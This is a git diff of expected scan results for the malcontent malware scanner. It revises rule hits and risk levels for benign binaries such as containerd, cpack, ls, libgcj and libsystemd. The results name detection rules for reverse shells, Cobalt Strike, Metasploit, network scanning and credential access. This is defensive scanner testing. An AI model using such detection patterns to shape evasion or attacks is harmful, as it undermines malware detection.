[probe](https://github.com/search?q=probe&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | +| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [%d.%d.%d.%d](https://github.com/search?q=%25d.%25d.%25d.%25d&type=code)
[Port](https://github.com/search?q=Port&type=code)
[Probe](https://github.com/search?q=Probe&type=code)
[Target](https://github.com/search?q=Target&type=code)
[banner](https://github.com/search?q=banner&type=code)
[connect](https://github.com/search?q=connect&type=code)
[port](https://github.com/search?q=port&type=code)
[probe](https://github.com/search?q=probe&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | | MEDIUM | [net/dns/over_https](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-over-https.yara#doh_refs) | Supports DNS (Domain Name Service) over HTTPS | [DnsOverHttps](https://github.com/search?q=DnsOverHttps&type=code)
[application/dns-message](https://github.com/search?q=application%2Fdns-message&type=code) | | MEDIUM | [net/dns/reverse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-reverse.yara#in_addr_arpa) | looks up the reverse hostname for an IP | [.in-addr.arpa](https://github.com/search?q=.in-addr.arpa&type=code)
[ip6.arpa](https://github.com/search?q=ip6.arpa&type=code) | | MEDIUM | [net/http/content_length_0](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/content-length-0.yara#content_length_0) | Sets HTTP content length to zero | [Content-Length: 0](https://github.com/search?q=Content-Length%3A+0&type=code) | @@ -82,8 +84,6 @@ | MEDIUM | [net/webrtc](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/webrtc.yara#webrtc_peer) | makes outgoing WebRTC connections | [RTCPeerConnection](https://github.com/search?q=RTCPeerConnection&type=code) | | MEDIUM | [os/kernel/opencl](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/kernel/opencl.yara#OpenCL) | support for OpenCL | [OpenCL](https://github.com/search?q=OpenCL&type=code) | | MEDIUM | [privesc/sudo](https://github.com/chainguard-dev/malcontent/blob/main/rules/privesc/sudo.yara#sudo) | calls sudo | [sudo chmod 1777 /dev/shm](https://github.com/search?q=sudo+chmod+1777+%2Fdev%2Fshm&type=code) | -| MEDIUM | [process/name_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-get.yara#process_name) | get the current process name | [process_name](https://github.com/search?q=process_name&type=code) | -| MEDIUM | [process/thread_local_storage](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/thread_local_storage.yara#tls_get_addr) | [looks up memory addresses for thread local storage or linked libraries](https://chao-tic.github.io/blog/2018/12/25/tls) | [__tls_get_addr](https://github.com/search?q=__tls_get_addr&type=code) | | MEDIUM | [sus/exclamation](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/exclamation.yara#exclamations) | gets very excited | [!!!!!!!!!!!!!!!!](https://github.com/search?q=%21%21%21%21%21%21%21%21%21%21%21%21%21%21%21%21&type=code)
[0 !!!!](https://github.com/search?q=0+++++++%21%21%21%21&type=code)
[0 !!!](https://github.com/search?q=0+++++%21%21%21&type=code)
[11366 !!](https://github.com/search?q=11366++++++%21%21&type=code)
[12366 !!!](https://github.com/search?q=12366++++++%21%21%21&type=code)
[12366 !!](https://github.com/search?q=12366+++++%21%21&type=code)
[AAHHKKO !!](https://github.com/search?q=AAHHKKO+++%21%21&type=code)
[ABHH !!](https://github.com/search?q=ABHH+++++%21%21&type=code)
[ABHH !!](https://github.com/search?q=ABHH++++%21%21&type=code)
[ACHIJNPRU !!](https://github.com/search?q=ACHIJNPRU+++%21%21&type=code)
[AGG !!](https://github.com/search?q=AGG+++++%21%21&type=code)
[CGIJMOQS !!](https://github.com/search?q=CGIJMOQS++++%21%21&type=code)
[Could not format log message !!](https://github.com/search?q=Could+not+format+log+message+%21%21&type=code)
[EE !!](https://github.com/search?q=EE++++%21%21&type=code)
[FFHHL !!](https://github.com/search?q=FFHHL+++%21%21&type=code)
[GG !!](https://github.com/search?q=GG++++%21%21&type=code)
[INVALID CONSTRUCTOR!!!](https://github.com/search?q=INVALID+CONSTRUCTOR%21%21%21&type=code)
[INVALID MAP!!!](https://github.com/search?q=INVALID+MAP%21%21%21&type=code)
[INVALID SHARED ON CONSTRUCTOR!!!](https://github.com/search?q=INVALID+SHARED+ON+CONSTRUCTOR%21%21%21&type=code)
[return !!](https://github.com/search?q=return+%21%21&type=code) | | MEDIUM | [sus/intercept](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/intercept.yara#interceptor) | References interception | [interceptBufferProtocol](https://github.com/search?q=interceptBufferProtocol&type=code)
[interceptFileProtocol](https://github.com/search?q=interceptFileProtocol&type=code)
[interceptHttpProtocol](https://github.com/search?q=interceptHttpProtocol&type=code)
[interceptResponse](https://github.com/search?q=interceptResponse&type=code)
[interceptStreamProtocol](https://github.com/search?q=interceptStreamProtocol&type=code)
[interceptStringProtocol](https://github.com/search?q=interceptStringProtocol&type=code)
[intercepted](https://github.com/search?q=intercepted&type=code)
[intercepting](https://github.com/search?q=intercepting&type=code)
[interceptionId](https://github.com/search?q=interceptionId&type=code)
[interceptionStage](https://github.com/search?q=interceptionStage&type=code)
[interceptorConfig](https://github.com/search?q=interceptorConfig&type=code)
[interceptorEv](https://github.com/search?q=interceptorEv&type=code)
[interceptor_config](https://github.com/search?q=interceptor_config&type=code)
[interceptor_info_map](https://github.com/search?q=interceptor_info_map&type=code)
[interceptor_url_loader_throttle](https://github.com/search?q=interceptor_url_loader_throttle&type=code)
[interceptors](https://github.com/search?q=interceptors&type=code)
[intercepts](https://github.com/search?q=intercepts&type=code) | | MEDIUM | [sus/leetspeak](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/leetspeak.yara#one_three_three_seven) | References 1337 terminology' | [1337](https://github.com/search?q=1337&type=code) | @@ -104,6 +104,7 @@ | LOW | [data/hash/sha1](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/sha1.yara#SHA1) | Uses the SHA1 signature format | [SHA1_](https://github.com/search?q=SHA1_&type=code) | | LOW | [data/random/insecure](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/random/insecure.yara#bsd_rand) | [generate random numbers insecurely](https://man.openbsd.org/rand) | [srand](https://github.com/search?q=srand&type=code) | | LOW | [discover/network/interface_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface-get.yara#bsd_if) | get network interfaces by name or index | [if_indextoname](https://github.com/search?q=if_indextoname&type=code)
[if_nametoindex](https://github.com/search?q=if_nametoindex&type=code) | +| LOW | [discover/process/parent_pid_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/parent_pid-get.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) | | LOW | [discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | | LOW | [discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | | LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | @@ -172,6 +173,5 @@ | LOW | [process/groupid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groupid-set.yara#setgid) | set real and effective group ID of process | [setgid](https://github.com/search?q=setgid&type=code) | | LOW | [process/groups_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groups-set.yara#setgroups) | set group access list | [setgroups](https://github.com/search?q=setgroups&type=code) | | LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) | -| LOW | [process/parent_pid_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/parent_pid-get.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) | | LOW | [process/userid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/userid-set.yara#setuid) | [set real and effective user ID of current process](https://man7.org/linux/man-pages/man2/setuid.2.html) | [setuid](https://github.com/search?q=setuid&type=code) | diff --git a/tests/linux/clean/containerd.simple b/tests/linux/clean/containerd.simple index a3083b132..aa2a81b85 100644 --- a/tests/linux/clean/containerd.simple +++ b/tests/linux/clean/containerd.simple @@ -73,7 +73,6 @@ fs/watch: low hw/dev/block_ice: medium hw/dev/mapper: medium impact/remote_access/heartbeat: medium -lateral/scan/tool: medium net/dns: low net/dns/reverse: medium net/dns/servers: low diff --git a/tests/linux/clean/cpack.md b/tests/linux/clean/cpack.md index cd340dd51..353ca110a 100644 --- a/tests/linux/clean/cpack.md +++ b/tests/linux/clean/cpack.md 
@@ -2,7 +2,7 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |--------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| HIGH | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_http_url_with_question) | contains hardcoded endpoint with a question mark | 
[https://jrsoftware.org/isinfo.php?](https://jrsoftware.org/isinfo.php?) | +| HIGH | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_php_url_with_question) | contains hardcoded endpoint with a question mark | [https://jrsoftware.org/isinfo.php?](https://jrsoftware.org/isinfo.php?) | | MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[Ip](https://github.com/search?q=Ip&type=code)
[Port](https://github.com/search?q=Port&type=code)
[local_ip](https://github.com/search?q=local_ip&type=code)
[use_port](https://github.com/search?q=use_port&type=code) | | MEDIUM | [crypto/file_encrypter](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/file-encrypter.yara#file_crypter) | Encrypts files | [cryptor](https://github.com/search?q=cryptor&type=code) | | MEDIUM | [data/base64/decode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/base64/base64-decode.yara#py_base64_decode) | decode base64 strings | [base64_decode](https://github.com/search?q=base64_decode&type=code) | @@ -30,7 +30,7 @@ | MEDIUM | [fs/proc/meminfo](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/meminfo.yara#proc_meminfo_val) | get memory info | [/proc/meminfo](https://github.com/search?q=%2Fproc%2Fmeminfo&type=code) | | MEDIUM | [fs/proc/self_exe](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/self-exe.yara#proc_self_exe) | gets executable associated to this process | [/proc/self/exe](https://github.com/search?q=%2Fproc%2Fself%2Fexe&type=code) | | MEDIUM | [impact/remote_access/crypto_listen_socks](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/crypto_listen_socks.yara#socks_crypto_listener) | socks crypto listener | [SOCKS5](https://github.com/search?q=SOCKS5&type=code)
[crypto](https://github.com/search?q=crypto&type=code)
[listen](https://github.com/search?q=listen&type=code)
[socks5](https://github.com/search?q=socks5&type=code) | -| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [%d.%d.%d.%d](https://github.com/search?q=%25d.%25d.%25d.%25d&type=code)
[connect](https://github.com/search?q=connect&type=code)
[port](https://github.com/search?q=port&type=code)
[probe](https://github.com/search?q=probe&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | +| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [%d.%d.%d.%d](https://github.com/search?q=%25d.%25d.%25d.%25d&type=code)
[Port](https://github.com/search?q=Port&type=code)
[Target](https://github.com/search?q=Target&type=code)
[connect](https://github.com/search?q=connect&type=code)
[port](https://github.com/search?q=port&type=code)
[probe](https://github.com/search?q=probe&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | | MEDIUM | [net/dns/over_https](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-over-https.yara#doh_refs) | Supports DNS (Domain Name Service) over HTTPS | [application/dns-message](https://github.com/search?q=application%2Fdns-message&type=code) | | MEDIUM | [net/download](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download/download.yara#download) | download files | [CPACK_DOWNLOAD_ALL](https://github.com/search?q=CPACK_DOWNLOAD_ALL&type=code)
[CPACK_DOWNLOAD_SITE](https://github.com/search?q=CPACK_DOWNLOAD_SITE&type=code)
[CPACK_IFW_DOWNLOAD_ALL](https://github.com/search?q=CPACK_IFW_DOWNLOAD_ALL&type=code)
[CPACK_INNOSETUP_DOWNLOAD_COUNT_INTERNAL](https://github.com/search?q=CPACK_INNOSETUP_DOWNLOAD_COUNT_INTERNAL&type=code)
[CPACK_INNOSETUP_DOWNLOAD_HASHES_INTERNAL](https://github.com/search?q=CPACK_INNOSETUP_DOWNLOAD_HASHES_INTERNAL&type=code)
[CPACK_INNOSETUP_DOWNLOAD_URLS_INTERNAL](https://github.com/search?q=CPACK_INNOSETUP_DOWNLOAD_URLS_INTERNAL&type=code)
[CPACK_USES_DOWNLOAD](https://github.com/search?q=CPACK_USES_DOWNLOAD&type=code)
[Call DownloadFile](https://github.com/search?q=Call+DownloadFile&type=code)
[DOWNLOAD HASH mismatch](https://github.com/search?q=DOWNLOAD+HASH+mismatch&type=code)
[DOWNLOAD cannot set TLS](https://github.com/search?q=DOWNLOAD+cannot+set+TLS&type=code)
[DOWNLOAD cannot set http](https://github.com/search?q=DOWNLOAD+cannot+set+http&type=code)
[DOWNLOAD cannot set url](https://github.com/search?q=DOWNLOAD+cannot+set+url&type=code)
[DOWNLOAD cannot set user](https://github.com/search?q=DOWNLOAD+cannot+set+user&type=code)
[DOWNLOAD error](https://github.com/search?q=DOWNLOAD+error&type=code)
[DOWNLOAD missing ALGO](https://github.com/search?q=DOWNLOAD+missing+ALGO&type=code)
[DOWNLOAD missing VAR for](https://github.com/search?q=DOWNLOAD+missing+VAR+for&type=code)
[Maxdownload](https://github.com/search?q=Maxdownload&type=code)
[VERIFY_DOWNLOADS](https://github.com/search?q=VERIFY_DOWNLOADS&type=code)
[_DOWNLOADED](https://github.com/search?q=_DOWNLOADED&type=code)
[completely downloaded](https://github.com/search?q=completely+downloaded&type=code)
[compute hash on downloaded file](https://github.com/search?q=compute+hash+on+downloaded+file&type=code)
[cw_download_write](https://github.com/search?q=cw_download_write&type=code)
[download_write body](https://github.com/search?q=download_write+body&type=code)
[download_write header](https://github.com/search?q=download_write+header&type=code)
[for the URL download method](https://github.com/search?q=for+the+URL+download+method&type=code)
[hash on failed download](https://github.com/search?q=hash+on+failed+download&type=code)
[is already downloaded](https://github.com/search?q=is+already+downloaded&type=code)
[isDownloaded](https://github.com/search?q=isDownloaded&type=code)
[maxdownload](https://github.com/search?q=maxdownload&type=code)
[partial download completed](https://github.com/search?q=partial+download+completed&type=code)
[protected CPackDownloadArchives](https://github.com/search?q=protected+CPackDownloadArchives&type=code)
[protected CPackDownloadComponents](https://github.com/search?q=protected+CPackDownloadComponents&type=code)
[protected CPackDownloadCount](https://github.com/search?q=protected+CPackDownloadCount&type=code)
[protected CPackDownloadHashes](https://github.com/search?q=protected+CPackDownloadHashes&type=code)
[protected CPackDownloadUrls](https://github.com/search?q=protected+CPackDownloadUrls&type=code)
[skipping download as file already](https://github.com/search?q=skipping+download+as+file+already&type=code)
[t resume download](https://github.com/search?q=t+resume+download&type=code) | | MEDIUM | [net/download/fetch](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download/fetch.yara#curl_value) | Invokes curl to download a file | [curl due to a build-time decision.](https://github.com/search?q=curl+due+to+a+build-time+decision.&type=code)
[curl function was given a bad argument](https://github.com/search?q=curl+function+was+given+a+bad+argument&type=code)
[curl is built without the HTTPS-proxy support.](https://github.com/search?q=curl+is+built+without+the+HTTPS-proxy+support.&type=code)
[curl lacks IDN support](https://github.com/search?q=curl+lacks+IDN+support&type=code)
[curl offers](https://github.com/search?q=curl+offers&type=code)
[curl understands](https://github.com/search?q=curl+understands&type=code)
[curl user interface](https://github.com/search?q=curl+user+interface&type=code) |
diff --git a/tests/linux/clean/default_config.json.simple b/tests/linux/clean/default_config.json.simple
index c87b72cff..0b0bb693b 100644
--- a/tests/linux/clean/default_config.json.simple
+++ b/tests/linux/clean/default_config.json.simple
@@ -53,7 +53,6 @@ hw/wireless: low
 impact/exploit: medium
 impact/exploit/cve: medium
 impact/remote_access/iptables: medium
-lateral/scan/tool: medium
 net/dns/servers: low
 net/download: medium
 net/http/cookies: medium
diff --git a/tests/linux/clean/kibana/securitySolution.chunk.9.js.simple b/tests/linux/clean/kibana/securitySolution.chunk.9.js.simple
index e2a82f889..59d257440 100644
--- a/tests/linux/clean/kibana/securitySolution.chunk.9.js.simple
+++ b/tests/linux/clean/kibana/securitySolution.chunk.9.js.simple
@@ -52,6 +52,8 @@ data/encoding/json_decode: low
 data/encoding/json_encode: low
 data/hash/md5: low
 discover/network/mac_address: medium
+discover/process/name_get: medium
+discover/process/parent_pid_get: low
 evasion/file/prefix: medium
 evasion/rootkit/refs: medium
 exec/cmd: medium
@@ -77,7 +79,6 @@ impact/remote_access/reverse_shell: high
 impact/remote_access/trojan: medium
 impact/rootkit: low
 lateral/scan/brute_force: low
-lateral/scan/tool: high
 net/dns/txt: low
 net/download: medium
 net/http/post: medium
@@ -92,8 +93,6 @@ net/url/request: medium
 os/kernel/seccomp: low
 persist/daemon: medium
 process/chroot: low
-process/name_get: medium
-process/parent_pid_get: low
 sec-tool/net/masscan: high
 sec-tool/net/nmap: medium
 sec-tool/pentest/metasploit_ref: medium
diff --git a/tests/linux/clean/kuma-cp.simple b/tests/linux/clean/kuma-cp.simple
index a06ab3b47..e81ca191a 100644
--- a/tests/linux/clean/kuma-cp.simple
+++ b/tests/linux/clean/kuma-cp.simple
@@ -81,7 +81,6 @@ fs/watch: low
 hw/dev/block_ice: medium
 impact/remote_access/heartbeat: medium
 impact/remote_access/iptables: medium
-lateral/scan/tool: medium
 net/dns: low
 net/dns/reverse: medium
 net/dns/servers: low
diff --git a/tests/linux/clean/ld-2.27.so.simple b/tests/linux/clean/ld-2.27.so.simple
index f9e612813..935e4f3f4 100644
--- a/tests/linux/clean/ld-2.27.so.simple
+++ b/tests/linux/clean/ld-2.27.so.simple
@@ -1,6 +1,7 @@
 # linux/clean/ld-2.27.so: medium
 anti-behavior/LD_DEBUG: medium
 anti-behavior/LD_PROFILE: medium
+discover/process/runtime_deps: medium
 evasion/hijack_execution/LD_LIBRARY_PATH: low
 evasion/hijack_execution/etc_ld.so.preload: medium
 fs/path/etc: low
@@ -12,5 +13,4 @@ fs/tempdir: low
 impact/exploit/GCONV_PATH: low
 net/url/embedded: low
 persist/shell/bash: medium
-process/thread_local_storage: medium
 sus/exclamation: medium
diff --git a/tests/linux/clean/libgcj.so.17.0.0.simple b/tests/linux/clean/libgcj.so.17.0.0.simple
index 33fc594bd..6d80a5ff9 100644
--- a/tests/linux/clean/libgcj.so.17.0.0.simple
+++ b/tests/linux/clean/libgcj.so.17.0.0.simple
@@ -1,4 +1,4 @@
-# linux/clean/libgcj.so.17.0.0: high
+# linux/clean/libgcj.so.17.0.0: medium
 3P/JPCERT/cobaltstrike_v3v4: medium
 c2/addr/ip: medium
 credential/password: low
@@ -18,6 +18,7 @@ data/hash/sha1: low
 data/hash/sha256: low
 data/hash/whirlpool: medium
 discover/network/interface_list: medium
+discover/process/name_get: medium
 discover/system/cpu_info: low
 discover/system/hostname_get: low
 discover/system/platform: low
@@ -50,7 +51,7 @@ fs/path/var: low
 fs/permission/modify: medium
 fs/proc/arbitrary_pid: medium
 fs/proc/mounts: medium
-fs/proc/pid_exe: high
+fs/proc/pid_exe: medium
 fs/proc/stat: medium
 fs/tempdir: low
 fs/tempdir/TEMP: low
@@ -82,7 +83,6 @@ net/url/embedded: low
 net/url/encode: medium
 net/url/parse: low
 process/multithreaded: low
-process/name_get: medium
 sus/exclamation: medium
 sus/intercept: medium
 sus/leetspeak: medium
diff --git a/tests/linux/clean/libgcj.so.17.simple b/tests/linux/clean/libgcj.so.17.simple
index 475b6f7dd..62cf9ab5c 100644
--- a/tests/linux/clean/libgcj.so.17.simple
+++ b/tests/linux/clean/libgcj.so.17.simple
@@ -1,4 +1,4 @@
-# linux/clean/libgcj.so.17: high
+# linux/clean/libgcj.so.17: medium
 3P/JPCERT/cobaltstrike_v3v4: medium
 c2/addr/ip: medium
 credential/password: low
@@ -18,6 +18,7 @@ data/hash/sha1: low
 data/hash/sha256: low
 data/hash/whirlpool: medium
 discover/network/interface_list: medium
+discover/process/name_get: medium
 discover/system/cpu_info: low
 discover/system/hostname_get: low
 discover/system/platform: low
@@ -50,7 +51,7 @@ fs/path/var: low
 fs/permission/modify: medium
 fs/proc/arbitrary_pid: medium
 fs/proc/mounts: medium
-fs/proc/pid_exe: high
+fs/proc/pid_exe: medium
 fs/proc/stat: medium
 fs/tempdir: low
 fs/tempdir/TEMP: low
@@ -82,7 +83,6 @@ net/url/embedded: low
 net/url/encode: medium
 net/url/parse: low
 process/multithreaded: low
-process/name_get: medium
 sus/exclamation: medium
 sus/intercept: medium
 sus/leetspeak: medium
diff --git a/tests/linux/clean/libsystemd.so.0.simple b/tests/linux/clean/libsystemd.so.0.simple
index 904a7a5e4..936565b97 100644
--- a/tests/linux/clean/libsystemd.so.0.simple
+++ b/tests/linux/clean/libsystemd.so.0.simple
@@ -1,6 +1,8 @@
 # linux/clean/libsystemd.so.0: medium
 data/compression/lzma: low
 data/random/insecure: low
+discover/process/parent_pid_get: low
+discover/process/runtime_deps: medium
 discover/user/USER: low
 evasion/file/location/var_run: medium
 exec/program: medium
@@ -20,7 +22,6 @@ fs/proc/self_cmdline: medium
 fs/proc/self_exe: medium
 fs/proc/self_status: medium
 fs/watch: low
-lateral/scan/tool: medium
 mem/anonymous_file: medium
 net/ip/addr: medium
 net/resolve/hostport_parse: low
@@ -37,6 +38,4 @@ process/groups_set: low
 process/multithreaded: low
 process/name_set: medium
 process/namespace_set: low
-process/parent_pid_get: low
-process/thread_local_storage: medium
 process/userid_set: low
diff --git a/tests/linux/clean/ls.x86_64.md b/tests/linux/clean/ls.x86_64.md index 0581d57d9..fe3d4731f 100644 --- a/tests/linux/clean/ls.x86_64.md +++ b/tests/linux/clean/ls.x86_64.md @@ -2,7 +2,6 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |--------|--------------------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [connect](https://github.com/search?q=connect&type=code)
[port](https://github.com/search?q=port&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) |
 | MEDIUM | [process/name_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-set.yara#__progname) | [get or set the current process name](https://stackoverflow.com/questions/273691/using-progname-instead-of-argv0) | [__progname](https://github.com/search?q=__progname&type=code) |
 | LOW | [data/compression/lzma](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/lzma.yara#gzip) | [works with lzma files](https://en.wikipedia.org/wiki/Lempel%E2%80%93Ziv%E2%80%93Markov_chain_algorithm) | [lzma](https://github.com/search?q=lzma&type=code) |
 | LOW | [discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) |
diff --git a/tests/linux/clean/lslogins.md b/tests/linux/clean/lslogins.md
index 61a1256c2..ede252252 100644
--- a/tests/linux/clean/lslogins.md
+++ b/tests/linux/clean/lslogins.md
@@ -1,11 +1,11 @@ -## linux/clean/lslogins [🛑 HIGH] +## linux/clean/lslogins [🟡 MEDIUM] | RISK | KEY | DESCRIPTION | EVIDENCE | |--------|--------------------------------------------------------------------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| HIGH | [evasion/logging/historical_logins](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/logging/historical_logins.yara#login_records) | accesses historical login records | 
[/var/log/lastlog](https://github.com/search?q=%2Fvar%2Flog%2Flastlog&type=code) | | MEDIUM | [collect/databases/sqlite](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/databases/sqlite.yara#sqlite) | accesses SQLite databases | [sqlite](https://github.com/search?q=sqlite&type=code) | | MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) | | MEDIUM | [evasion/logging/failed_logins](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/logging/failed_logins.yara#failed_logins) | accesses failed logins | [/var/log/btmp](https://github.com/search?q=%2Fvar%2Flog%2Fbtmp&type=code) | +| MEDIUM | [evasion/logging/historical_logins](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/logging/historical_logins.yara#login_records) | accesses historical login records | [/var/log/lastlog](https://github.com/search?q=%2Fvar%2Flog%2Flastlog&type=code) | | MEDIUM | [fs/path/home](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/home.yara#home_path) | references path within /home | [/home/linuxbrew/.linuxbrew/Cellar/util-linux/2.40.2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Futil-linux%2F2.40.2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/util-linux/2.40.2/share/locale](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Futil-linux%2F2.40.2%2Fshare%2Flocale&type=code)
[/home/linuxbrew/.linuxbrew/lib/ld.so](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Flib%2Fld.so&type=code)
[/home/linuxbrew/.linuxbrew/opt/gcc/lib/gcc/current](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgcc%2Flib%2Fgcc%2Fcurrent&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxcrypt/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxcrypt%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/ncurses/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fncurses%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/readline/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Freadline%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/sqlite/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fsqlite%2Flib&type=code)
